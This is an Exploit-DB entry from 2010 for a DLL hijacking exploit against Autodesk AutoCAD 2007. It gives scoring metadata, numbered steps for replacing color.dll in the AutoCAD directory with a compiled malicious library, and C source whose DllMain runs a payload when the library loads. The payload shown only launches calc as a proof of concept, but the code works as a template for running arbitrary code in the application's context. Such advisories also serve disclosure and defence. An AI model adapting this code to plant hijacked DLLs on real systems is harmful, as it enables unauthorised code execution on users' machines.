Lucene search

K
exploitdbXsploited securityEDB-ID:14793
HistoryAug 25, 2010 - 12:00 a.m.

Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking

2010-08-2500:00:00
xsploited security
www.exploit-db.com
31

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

27.6%

/*
Description: 
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Title: Autocad 2007 Professional dll (color.dll) Hijacking exploit
Author: xsploited security
URL: http://www.x-sploited.com/
Email: [email protected]

Instructions:

1. Compile dll
2. Replace color.dll in autocad directory with your newly compiled dll
3. Launch Autocad 2007
4. Boom calc!

Shoutz:

kAoTiX, Deca, Drizzle, 0xJeremy, Sheep, SpliT, all other security guru's and teams.
*/

#include <windows.h>

int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}

AI Score

7.4

Confidence

Low

EPSS

0.001

Percentile

27.6%

Related for EDB-ID:14793